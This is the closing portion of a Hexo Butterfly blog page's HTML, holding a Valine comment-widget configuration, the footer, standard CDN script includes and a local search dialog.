guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;

window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'B4MWK3jES1qGbtBKYREeYapv-MdYXbMMI',
  appKey:'xxVauV1EEthTexdSDuumgDvx',
  placeholder:'谈谈你的看法吧！',
  avatar:'mm',
  guest_info:guest_info,
  pageSize:'10',
  lang:'zh-cn',
  recordIP: true
});</script></div></div></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2019 - 2023 By 青花@Blue_And_White</div><div class="framework-info"><span>驱动 </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a href="https://github.com/jerryc127/hexo-theme-butterfly"><span>Butterfly</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><a id="to_comment" href="#post-comment" title="直达评论"><i class="scroll_to_comment fa fa-comments">  </i></a><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/gh/jerryc127/butterfly_cdn@2.1.0/js/fireworks.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lazysizes@latest/lazysizes.min.js" async></script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>